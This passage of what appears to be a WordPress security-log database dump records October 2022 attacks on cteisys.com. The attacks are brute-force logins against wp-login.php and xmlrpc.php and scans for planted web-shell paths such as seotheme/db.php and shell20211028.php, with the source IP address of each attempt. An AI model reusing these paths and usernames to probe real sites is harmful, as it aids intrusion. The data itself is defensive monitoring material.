kLb98nhvCeIY2uaRKr03JP','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('89.249.74.218',1509509850,'joyce',0,1665942511.2421,152,'OMycx6H201lJBGSvVQnijpwC','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('89.249.74.218',1509509850,'joyce',0,1665942398.8153,152,'uVCrD3LJSOjcwqk4A6t9XPhs','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('82.165.184.74',1386592330,'newd',0,1665942255.1999,7,'U1Q8HljrTdNOKcaY7zA4hupM','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('142.93.203.156',2388511644,'newd',0,1665941850.9915,7,'hHal7GRiOoknZWYQT5w1t4CJ','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('62.102.148.164',1046910116,'Joyce',0,1665940780.9900,152,'gcv3HRF8wptYhfaxXDOlMekG','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('145.239.30.120',2448367224,'newd',0,1665939932.3430,7,'QtOWnwJaEHieSkI45ZV2xvzq','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('69.163.186.158',1168358046,'newd',0,1665939919.6412,7,'Qp6D2M7BJoebVcNj15fhGdA8','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('103.163.139.202',1738771402,'newd',0,1665946017.0414,7,'NWl6AV0K8UXuPc2Iz1tD935E','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('95.217.179.54',1608102710,'newd',0,1665945625.6739,7,'4wc0zjFvuxyhqZ9PdCQV7XMe','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('103.163.139.202',1738771402,'newd',0,1665943755.7534,7,'zFckuTNmwSnb24q6xsriHJMg','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('188.166.183.39',3165042471,'newd',0,1665943743.4638,7,'KXs69uPlmQWCa8HNdUeyLR7c','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('159.223.170.181',2682235573,'newd',0,1665949375.9327,7,'OfJiXjl20IULkQEBwTArc36h','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('185.206.225.51',3117343027,'joyce',0,1665949111.9887,152,'8fOoraD5U10MpERgleiKxAnb','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('193.37.254.3',3240492547,'Joyce',0,1665949075.1511,152,'Jv8XViDLZx3hReSGj2zg10q5','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('159.203.143.36',2680917796,'newd',0,1665947521.0104,7,'UYAmIcbsoGdJV5ENZ2hDStXH','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('103.130.218.178',1736628914,'newd',0,1665947491.5682,7,'gweLA418sVuCrmZR5qhT2jH0','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('213.152.161.85',3583549781,'joyce',0,1665947417.0517,152,'enJXEcY3yTNbWrk6d4t5DqO1','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('109.168.97.89',1839751513,'newd',0,1665957489.9102,7,'dlyb7DXZ2tKQBPWcJsSrGL6k','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('194.233.77.4',3270069508,'newd',0,1665957078.5658,7,'PvixyOlSsajet03qzRKIVr9Z','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('93.114.185.76',1567799628,'newd',0,1665953612.9533,7,'QsayFoTDXdhVnO3mJrUSAIvG','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('46.105.29.21',778640661,'newd',0,1665953203.8263,7,'MOhXiL2VQIk5JEjaFH7PoT3y','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('213.152.161.15',3583549711,'Joyce',0,1665952053.9114,152,'WD4eRqoQzjA6YitTPrZS7flH','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('95.217.129.44',1608089900,'newd',0,1665951293.6296,7,'tUgXrRvOieCbP7KxJE4YThSc','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('185.2.4.33',3103917089,'newd',0,1665951279.2929,7,'xKFkciaSZEvb97Y1C4QfJoPX','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('213.152.162.74',3583550026,'joyce',0,1665956361.1397,152,'c3fWUn5PELayq7sxpRTN8OvH','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('94.231.86.20',1592219156,'newd',0,1665955142.9002,7,'vsP0beNGJBQ7DAXy3zokmC8T','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('120.78.15.126',2018381694,'newd',0,1665955118.3558,7,'DrRBGEH9O7UaQIcghMPYo4d2','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('20.235.95.88',350969688,'',0,1665955068.7846,55,'jUVA6EK9H7XDcNCnw5vFTIM2','','19|0|0|0|cteisys.com//wp-content/themes/seotheme/db.php',0,19,0),('213.152.162.15',3583549967,'joyce',0,1665954468.7786,152,'X2DkfqiQ5JptErYHI0aFcCAx','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('20.77.97.187',340615611,'',0,1665961324.8057,55,'7RuhlEGpPyaVI5XZxw02fn3A','','19|0|0|0|cteisys.com/wp-content/themes/seotheme/db.php',0,19,0),('20.77.97.187',340615611,'',0,1665961323.0582,55,'IPX4wnjKm3dzuVg5yDcHpLxJ','','19|0|0|0|cteisys.com/wp-content/themes/seotheme/db.php',0,19,0),('51.255.81.60',872370492,'newd',0,1665960988.3739,7,'3LtgHATQDUvdy0ejruV1oW7q','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('20.25.142.53',337219125,'',0,1665959912.5829,55,'3kD1gjbV2Y9fnMvc6RWtea4y','','19|0|0|0|cteisys.com/wp-content/themes/seotheme/db.php',0,19,0),('20.25.142.53',337219125,'',0,1665959903.9783,55,'NKTbQnAwSPyHZFrqEJRt1GI7','','19|0|0|0|cteisys.com/wp-content/themes/seotheme/db.php',0,19,0),('46.32.228.70',773907526,'newd',0,1665959065.4162,7,'4oGARqi6UsPltd7LHDpCk8Yc','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('143.244.140.199',2415168711,'newd',0,1665962951.8161,7,'XEw1kKQDNjGSZMx8oULmFRq0','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('128.199.14.4',2160528900,'newd',0,1665962939.8340,7,'hFi6sjP2zX8EAOIGygHMltnq','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('178.128.5.109',2994734445,'newd',0,1665961386.4611,7,'hI3LWXJzaFmCcNetsD1PH0yM','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('192.30.89.51',3223214387,'Joyce',0,1665968185.1859,152,'GpSmbI9zUWYwv1RjKCdcB8ni','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('81.88.52.221',1364735197,'newd',0,1665966847.8754,7,'L9KOhcYUTFxj4vPJ0rQtRq73','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('188.166.236.35',3165056035,'newd',0,1665966834.7335,7,'6aOSFxutGQIpoWDgAhvm0PiB','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('148.72.214.245',2487801589,'newd',0,1665965302.3839,7,'HBWfPFvwpYGLT18nt0NC3Rdc','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('46.105.29.21',778640661,'newd',0,1665964877.2393,7,'53RQwouDUgcT6aXq8WFBfelS','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('146.70.61.147',2454076819,'Joyce',0,1665971968.0101,152,'zJOBDqhHrldbEGeyN53gM0KP','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('66.33.193.231',1109508583,'newd',0,1665970724.7821,7,'ruD2R05YpbSLaKGx86HWNZ4X','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('167.172.105.95',2813094239,'newd',0,1665969203.1281,7,'JBP8Yrjisk73dnREbzMvpfNa','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('188.212.34.69',3168019013,'newd',0,1665968783.4778,7,'2YQieBo5WRUFcDHhN80tGvxu','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('188.166.61.228',3165011428,'newd',0,1665973136.6963,7,'QHzONZ3cTyiFx9ISvk6fj8BM','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('93.114.185.76',1567799628,'newd',0,1665972700.7601,7,'AiDdu4fOvhWB8EYpajlroS9g','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('46.19.137.116',773032308,'joyce',0,1665972417.3919,152,'JVi2cZqtx7zFgQB6XaCSsWhN','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('107.189.13.99',1807551843,'Joyce',0,1665972343.5872,51,'uxpSK7B8r4AaJomleRtLNdn2','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('139.59.82.122',2335920762,'newd',0,1665978628.2127,7,'M67xNpt18Ilq3LBJ9bFk0eK2','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('192.227.155.193',3236142017,'newd',0,1665978603.2775,7,'rxjvNw5C7Ks8eg1UtTu9yRZf','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('45.55.44.23',758590487,'newd',0,1665977058.5947,7,'2TmMc80oyAOgpntslbkdNKPq','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('81.88.52.221',1364735197,'newd',0,1665976663.7026,7,'6dKWilT9P3xCF7uOaDbfhABQ','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('93.114.185.76',1567799628,'newd',0,1665982453.8704,7,'4ZlsAk5m1xqn2tyr9jOBF06p','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('159.203.121.12',2680912140,'newd',0,1665982443.9429,7,'V0o5fwAbiIDx4g2Q6mGHeKPC','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('152.228.208.88',2565132376,'newd',0,1665980946.4344,7,'Zu6ARDKfJlz07hnvdNjoe12P','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('172.104.219.25',2892552985,'newd',0,1665980552.1303,7,'iq09CtJP2BVrMaUeWS73fKHR','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('14.225.255.250',249692154,'newd',0,1665986252.9769,7,'yVv8Sf5eq4uInJbUZRdstC7i','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('157.230.15.115',2649100147,'newd',0,1665986239.2506,7,'PnXgcVZUr291s3FxehYkij0B','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('85.146.18.88',1435636312,'newd',0,1665984737.7510,7,'MD3TiGPvLKgdx0QowumR9fCH','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('165.22.198.112',2769733232,'newd',0,1665984330.9375,7,'iEhnosK9D5T7H2w3jyQ8FOVg','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('106.52.120.186',1781823674,'newd',0,1665992112.3398,7,'H9DWV4Oey65zhkAsJZLnfIBE','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('188.166.183.39',3165042471,'newd',0,1665990173.4503,7,'7rVJoKbp5X2HlqLaBMATZecx','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('43.251.133.57',737903929,'newd',0,1665990157.1551,7,'j3DxkWRIYsP67QJBm5Xq4MVn','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('104.41.221.5',1747574021,'newd',0,1665988614.0009,7,'WDKpmc93IEk1yhSj8VaRBzie','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('146.148.44.185',2459184313,'newd',0,1665988193.4828,7,'B6YPqN1HoRLmrWGeigXlQnx9','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('43.251.133.57',737903929,'newd',0,1665992526.1423,7,'rNPfeqSIGh2jQAnTyzlFYL6d','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('159.89.109.117',2673438069,'newd',0,1665996027.9083,7,'uKCzsc4Qw9yjXqO0EmFxlWSH','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('51.159.155.6',866097926,'newd',0,1665994077.9114,7,'JtR0Y5OkS7I8T2bMKHXaPrqB','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('165.232.180.174',2783491246,'newd',0,1665994065.2724,7,'yZQXY8Juj4vMiWSrLa3VoRD5','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('139.59.85.224',2335921632,'newd',0,1666000393.3643,7,'wvKmPGkp2ELSYNcX0Mba9Hit','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('39.108.148.88',661427288,'newd',0,1665999992.5447,7,'i6wZjVmTMC9bH3lWRNzDdX01','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('20.68.176.92',340045916,'',0,1665999681.7806,55,'4PeVan1hDw89mGKkCoXFigMB','','19|0|0|0|cteisys.com/wp-content/themes/seotheme/db.php',0,19,0),('20.68.176.92',340045916,'',0,1665999679.0999,55,'6bCaIvEVsjR0T5MOLNZ1F4Kq','','19|0|0|0|cteisys.com/wp-content/themes/seotheme/db.php',0,19,0),('51.89.47.206',861482958,'newd',0,1665998041.0076,7,'eWOuNrhxyzaj03ToQZ4nqEFV','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('165.232.180.174',2783491246,'newd',0,1665998032.0351,7,'JPqLrlgBKIcvo6AZf0DRhtCw','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('195.206.105.227',3285084643,'joyce',0,1665997234.4889,152,'nqLDamG71ZVRUf2xPeQiYETb','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('147.182.249.22',2478242070,'newd',0,1666004353.6990,7,'MIQvpC7SeZ2E09kjViq8Rwux','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('138.68.180.230',2319758566,'newd',0,1666003939.9214,7,'91hxO0M64GBlK3vpdZ8rE7mN','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('51.255.81.60',872370492,'newd',0,1666001968.6160,7,'kLUJD68KdeIrCqEYsgZMu3Fn','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('69.163.186.158',1168358046,'newd',0,1666001953.7180,7,'hBiulO6gaStWcYnPXZdT02Qq','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('103.130.219.13',1736629005,'newd',0,1666007905.0317,7,'lr9Z5mbG1KkQ4utFdJOhjsva','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('159.65.24.108',2671843436,'',0,1666007548.8407,55,'9nv2xo6zdgjNutKsPbqwJW4L','','19|0|0|0|cteisys.com/wp-commentin.php',0,19,0),('47.114.72.18',796018706,'newd',0,1666005929.4059,7,'Vt5XqEWrO3lhoCa74kLp2SRz','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('34.82.166.13',575841805,'newd',0,1666005902.9692,152,'MRvWiKkGV4YnstjdaOErZypL','','0|0|0|0|cteisys.com//xmlrpc.php',0,0,0),('34.82.166.13',575841805,'newd',0,1666005901.8718,152,'dsiyTMYrUAQvD9HWbEJI46NX','','0|0|0|0|cteisys.com//xmlrpc.php',0,0,0),('34.82.166.13',575841805,'newd',0,1666005900.8581,152,'DgHwR4PbtVn7hiplxQWmIAY8','','0|0|0|0|cteisys.com//xmlrpc.php',0,0,0),('51.255.81.60',872370492,'newd',0,1666005896.7287,7,'zhCiFMvfdjHTur4byLPqptWR','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('69.163.186.158',1168358046,'newd',0,1666011909.8122,7,'CbVfyOepL3xJrF7MPUTg9dlK','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('47.115.24.165',796072101,'newd',0,1666009907.8898,7,'kUoj2xNzEuXHe5Y7OaSK9RB4','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('139.59.82.122',2335920762,'newd',0,1666009885.9783,7,'KR5bDMlvGm07z6xs9uFVQ4H2','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('103.130.218.178',1736628914,'newd',0,1666008326.6209,7,'UC7izXclm2OoxHdE3rgFNfQJ','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('205.185.116.156',3451483292,'Joyce',0,1666008012.0585,51,'oEOziYuML3S7XGVD4K9gc2wa','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('175.178.125.173',2947710381,'newd',0,1666013944.7014,7,'Kh2EAl0sFIpdryTmnzgHt7vQ','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('185.2.4.33',3103917089,'newd',0,1666012336.0425,7,'ucDgE6MR2kazxA5HZGJVFXKo','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('81.88.52.8',1364734984,'newd',0,1666017978.2210,7,'16Xnt9i7CJKRpgHOd35Uhw2m','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('51.255.81.60',872370492,'newd',0,1666017962.7447,7,'h0sYamVLozUMykEISZgC62dp','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('143.244.155.35',2415172387,'newd',0,1666016366.1123,7,'W7vROG3sXFHdBINUQP9u6Srl','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('167.172.168.111',2813110383,'newd',0,1666015939.4241,7,'CJ8YAtQrqcWGeK2vNjLgah6P','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('13.69.21.1',222631169,'',0,1666023322.6754,55,'aZL12xkcYH8X0pCmJ6tFPnul','','19|0|0|0|cteisys.com/wp-plain.php',0,19,0),('13.69.21.1',222631169,'',0,1666023322.3937,55,'iYd9DcfrNZsq7Gwt4kUnK53v','','19|0|0|0|cteisys.com/wp-plain.php',0,19,0),('80.88.88.149',1347967125,'newd',0,1666020440.6224,7,'0lfLsIWdpmonceBCYSXPykHx','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('133.130.103.36',2239915812,'newd',0,1666020007.9782,7,'5V8RaKNUpMFhcel2gQjSPf3t','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('51.89.119.182',861501366,'',0,1666025439.9616,55,'UJCQkTtaSDHxF9BsbwGyiYoE','','19|0|0|0|cteisys.com/wp-content/themes/seotheme/mar.php',0,19,0),('51.89.119.182',861501366,'',0,1666025437.3333,55,'vTt8bSmR5V6CudFErYfZBKas','','19|0|0|0|cteisys.com/wp-content/themes/seotheme/mar.php',0,19,0),('197.242.145.205',3321008589,'',0,1666032901.7181,55,'M8sn4LYzNDx59ZuQJPGBpHC1','','19|0|0|0|cteisys.com/wp-content/plugins/core-engine/admin.php',0,19,0),('197.242.145.205',3321008589,'',0,1666032896.0075,55,'5fqzoCbTLBO1ZeHGSgrnQRVX','','19|0|0|0|cteisys.com/wp-admin/wikindex.php',0,19,0),('197.242.145.205',3321008589,'',0,1666032893.1850,55,'ra4VFkom8hLiTxl7jWwpQtuq','','19|0|0|0|cteisys.com/wp-includes/rest-api/endpoints/radio.php',0,19,0),('197.242.145.205',3321008589,'',0,1666032891.0503,55,'ouvYwbLpCXPy1hD8rqZsa6mj','','19|0|0|0|cteisys.com/wp-content/themes/classic/inc/admin.php',0,19,0),('197.242.145.205',3321008589,'',0,1666032884.0170,55,'I0qQzh3cNZEvMjp2exgObXr4','','19|0|0|0|cteisys.com/wp-admin/css/colors/radio.php',0,19,0),('197.242.145.205',3321008589,'',0,1666032881.4076,55,'xd943u2i7ScBwetRhGPQOVL8','','19|0|0|0|cteisys.com/wp-admin/js/widgets/radio.php',0,19,0),('197.242.145.205',3321008589,'',0,1666032874.7574,55,'eGTOy7AxblpDMWwNXH4Igrtk','','19|0|0|0|cteisys.com/radio.php',0,19,0),('197.242.145.205',3321008589,'',0,1666032872.6615,55,'0IUGDZxEmRvbJfldyreFQh5w','','19|0|0|0|cteisys.com/about.php',0,19,0),('197.242.145.205',3321008589,'',0,1666032867.6784,55,'EjkGOIVMwlTpfXzgiKuRbS81','','19|0|0|0|cteisys.com/css/votes.php',0,19,0),('197.242.145.205',3321008589,'',0,1666032863.6285,55,'xCsNJiK8z1mE2tO9MRdgTpSy','','19|0|0|0|cteisys.com/wikindex.php',0,19,0),('197.242.145.205',3321008589,'',0,1666032861.0443,55,'Fgf61aSJUqls7W8u40vMNhmb','','19|0|0|0|cteisys.com/admin.php',0,19,0),('197.242.145.205',3321008589,'',0,1666032859.2057,55,'ze90msH167hQrdZf8UbWiYSl','','19|0|0|0|cteisys.com/load.php',0,19,0),('197.242.145.205',3321008589,'',0,1666032857.6183,55,'dTGCBD9ZEi6pwa1ezNPkcV7g','','19|0|0|0|cteisys.com/1index.php',0,19,0),('197.242.145.205',3321008589,'',0,1666032855.4396,55,'pYfFVoLgHaWjlbniCeIM5c1D','','19|0|0|0|cteisys.com/2index.php',0,19,0),('197.242.145.205',3321008589,'',0,1666032852.1969,55,'L6CUQemfW7tO3RnIJ1x5pTis','','19|0|0|0|cteisys.com/votes.php',0,19,0),('197.242.145.205',3321008589,'',0,1666032849.3218,55,'3eONYEXt610J2LjMPDsTWmfz','','19|0|0|0|cteisys.com/css/load.php',0,19,0),('197.242.145.205',3321008589,'',0,1666032846.6534,10,'Lr6mXpanEjtQ3BgcbyqKwC8G','','707|0|0|0|cteisys.com/contents.php',0,707,0),('197.242.145.205',3321008589,'',0,1666032846.6261,55,'Lr6mXpanEjtQ3BgcbyqKwC8G','','19|0|0|0|cteisys.com/contents.php',0,19,0),('197.242.145.205',3321008589,'',0,1666032843.4476,55,'NcOwqGf1rodUmFT36IkQuYDB','','19|0|0|0|cteisys.com/css/contents.php',0,19,0),('197.242.145.205',3321008589,'',0,1666032841.3113,55,'PDoScsml1hrjM20WHNOiJfav','','19|0|0|0|cteisys.com/years.php',0,19,0),('197.242.145.205',3321008589,'',0,1666032833.2433,55,'uUsObGat2YCkd5ZLezXmqvcy','','19|0|0|0|cteisys.com/wp-content/themes/seotheme/about.php',0,19,0),('197.242.145.205',3321008589,'',0,1666032830.0286,55,'fYAGvqSjCelPUB2FN5hwWHmb','','19|0|0|0|cteisys.com/wp-content/themes/pridmag/about.php',0,19,0),('185.83.144.103',3109261415,'',0,1666036187.2951,55,'ofhCVJaUKsYR0c1G9ButTkQI','','19|0|0|0|cteisys.com/phpinfo.php.bak',0,19,0),('185.83.144.103',3109261415,'',0,1666036187.2908,55,'0ZGURrQyBtEk2mszK87PWqIg','','19|0|0|0|cteisys.com/phpinfo.php.bak',0,19,0),('51.89.119.182',861501366,'',0,1666035934.2388,55,'DzSNkwC8qWp5aGViKb42FZP6','','19|0|0|0|cteisys.com/wp-includes/shell20211028.php',0,19,0),('51.89.119.182',861501366,'',0,1666035928.2123,55,'NWDOt0Iv2f93iwApK1LbkJ7V','','19|0|0|0|cteisys.com/wp-includes/shell20211028.php',0,19,0),('20.77.97.187',340615611,'',0,1666047405.6780,55,'kKcgHW5ZJGb8sIB1i0avfyFA','','19|0|0|0|cteisys.com/wp-content/themes/seotheme/db.php',0,19,0),('20.77.97.187',340615611,'',0,1666047389.1348,55,'YfaL3jbtlyTAwRV7h6i9IMHe','','19|0|0|0|cteisys.com/wp-content/themes/seotheme/db.php',0,19,0),('171.244.17.110',2884899182,'newd',0,1666047131.2800,152,'5gvahNcHMYTwf3VqI7iOeyK4','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('81.68.222.69',1363467845,'newd',0,1666045655.6895,152,'K80Mdg4F2TeCuNhVmHIzEDUc','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('154.6.86.21',2584106517,'newd',0,1666045464.4203,152,'bkuNJg7xtrBFeoQI6UDsjnh3','','0|0|0|0|cteisys.com//xmlrpc.php',0,0,0),('51.255.64.58',872366138,'newd',0,1666048656.4114,152,'JTfPOijbwyGnvIsQMHYSmuA7','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('208.109.214.179',3496859315,'newd',0,1666054844.4068,152,'GcNs27wY0elu4hT8dMEmk3O5','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('124.158.12.149',2090732693,'newd',0,1666054049.8853,152,'Eak0ZR1eBDlQcCGzjgdqf2S8','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('162.14.71.142',2718844814,'newd',0,1666053252.3176,152,'o3tRgyY0nBF8ZQzJeATqrkO7','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('18.229.212.101',317052005,'newd',0,1666052460.3987,152,'1Z4nPdTXk7NvGJoKwbOqsxDU','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('123.31.21.26',2065634586,'newd',0,1666058055.1962,152,'jksiVyC6el17S3PBNXhDF5nA','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('20.25.142.53',337219125,'',0,1666057586.6204,55,'wHzNT59uID3gAqVp0EhLByF8','','19|0|0|0|cteisys.com/wp-content/themes/seotheme/db.php',0,19,0),('20.25.142.53',337219125,'',0,1666057568.2731,55,'EafiXKjRq9Zr4Bv6cCWdHQt0','','19|0|0|0|cteisys.com/wp-content/themes/seotheme/db.php',0,19,0),('198.98.60.32',3328326688,'Joyce',0,1666059360.2319,51,'91H0QlzqGarm4StvuYyRCjBf','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('157.245.166.98',2650121826,'newd',0,1666058881.8777,152,'1JMbWNHCxuDTtzvgBP0srQiR','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('93.113.111.193',1567715265,'newd',0,1666066554.5984,152,'1k2xoAwpgC8y7fdHIUGOTEm3','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('47.254.69.184',805193144,'',0,1666066284.3380,55,'94uDKpwQdEUmjLcVnh1izryR','','19|0|0|0|cteisys.com/wp-content/plugins/core-engine/admin.php',0,19,0),('47.254.69.184',805193144,'',0,1666066283.6900,55,'7gDpj31H80Cdvos5iycuwTIY','','19|0|0|0|cteisys.com/wp-admin/wikindex.php',0,19,0),('47.254.69.184',805193144,'',0,1666066282.9946,55,'JvGfT67sSKtBYV38abEhw2CD','','19|0|0|0|cteisys.com/wp-includes/rest-api/endpoints/radio.php',0,19,0),('47.254.69.184',805193144,'',0,1666066282.3597,55,'sPktKLQGdx1gj75uEwhleHrI','','19|0|0|0|cteisys.com/wp-content/themes/classic/inc/admin.php',0,19,0),('47.254.69.184',805193144,'',0,1666066281.4438,55,'3x5nwHIpzVsGobF89tZjf61M','','19|0|0|0|cteisys.com/wp-admin/css/colors/radio.php',0,19,0),('47.254.69.184',805193144,'',0,1666066280.7146,55,'GibP18LKQtDShuxwdfvngqWZ','','19|0|0|0|cteisys.com/wp-admin/js/widgets/radio.php',0,19,0),('47.254.69.184',805193144,'',0,1666066279.7012,55,'6rfkp0gTDFHG1Y4qjQXvPlIZ','','19|0|0|0|cteisys.com/radio.php',0,19,0),('47.254.69.184',805193144,'',0,1666066278.8529,55,'o4XpVhy8BrRCi9gNz7Tdlsef','','19|0|0|0|cteisys.com/about.php',0,19,0),('47.254.69.184',805193144,'',0,1666066277.9517,55,'WsGrHqZbS854nk10pPRhzj3e','','19|0|0|0|cteisys.com/css/votes.php',0,19,0),('47.254.69.184',805193144,'',0,1666066277.0703,55,'xX78LPEF9iS1GhlQse4KOU5T','','19|0|0|0|cteisys.com/wikindex.php',0,19,0),('47.254.69.184',805193144,'',0,1666066276.1763,55,'0ZI4HDd8U7E5o3ksMVrKNlOQ','','19|0|0|0|cteisys.com/admin.php',0,19,0),('47.254.69.184',805193144,'',0,1666066275.5406,55,'9AmYWreDfCwx8az0IGbXgBO5','','19|0|0|0|cteisys.com/load.php',0,19,0),('186.234.80.28',3135918108,'newd',0,1666065551.0526,152,'1UIfgRtVyeY4jWOX38c9rkmZ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('192.185.4.121',3233350777,'newd',0,1666065297.6014,152,'7aHZCwXyK6c0JsfqBGzgIAep','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('43.225.53.24',736179480,'newd',0,1666064940.1361,152,'0kKDaRHs9rQZbn6WhuoTOlvN','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('162.240.216.162',2733693090,'newd',0,1666064219.7380,152,'ber3qG5nFT8XMLZ7lNmcODWu','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('139.59.228.23',2335958039,'newd',0,1666063316.5101,152,'R7sGVecBvWx5ZgEDdPKT364N','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('47.254.69.184',805193144,'',0,1666066274.7304,55,'FTZUD3Hv2Xmf1Rai9MLQcyPu','','19|0|0|0|cteisys.com/1index.php',0,19,0),('47.254.69.184',805193144,'',0,1666066273.9270,55,'dtlEmfqUG4ayQHAzjPie3LWp','','19|0|0|0|cteisys.com/2index.php',0,19,0),('47.254.69.184',805193144,'',0,1666066273.1614,55,'p2qNQGOFJLAboIPVzDRcTjME','','19|0|0|0|cteisys.com/votes.php',0,19,0),('47.254.69.184',805193144,'',0,1666066272.4313,55,'RKBHYgwxntATCXoqO2pWUahy','','19|0|0|0|cteisys.com/css/load.php',0,19,0),('47.254.69.184',805193144,'',0,1666066271.7623,10,'TjACLzSgWrRqE30J8nYK5Qmc','','707|0|0|0|cteisys.com/contents.php',0,707,0),('47.254.69.184',805193144,'',0,1666066271.7595,55,'TjACLzSgWrRqE30J8nYK5Qmc','','19|0|0|0|cteisys.com/contents.php',0,19,0),('47.254.69.184',805193144,'',0,1666066271.0749,55,'PTGMvdoyLFuK2QtXN0CZlUVx','','19|0|0|0|cteisys.com/css/contents.php',0,19,0),('47.254.69.184',805193144,'',0,1666066270.3132,55,'Td7BmH61SFWhUiPYsMG0aI9N','','19|0|0|0|cteisys.com/years.php',0,19,0),('47.254.69.184',805193144,'',0,1666066269.6691,55,'HasCEIXpAiWYfkLoGKS2c0uN','','19|0|0|0|cteisys.com/wp-content/themes/seotheme/about.php',0,19,0),('47.254.69.184',805193144,'',0,1666066269.0354,55,'mu1ZT3QLAKqhPB7JYvsrjRyg','','19|0|0|0|cteisys.com/wp-content/themes/pridmag/about.php',0,19,0),('20.2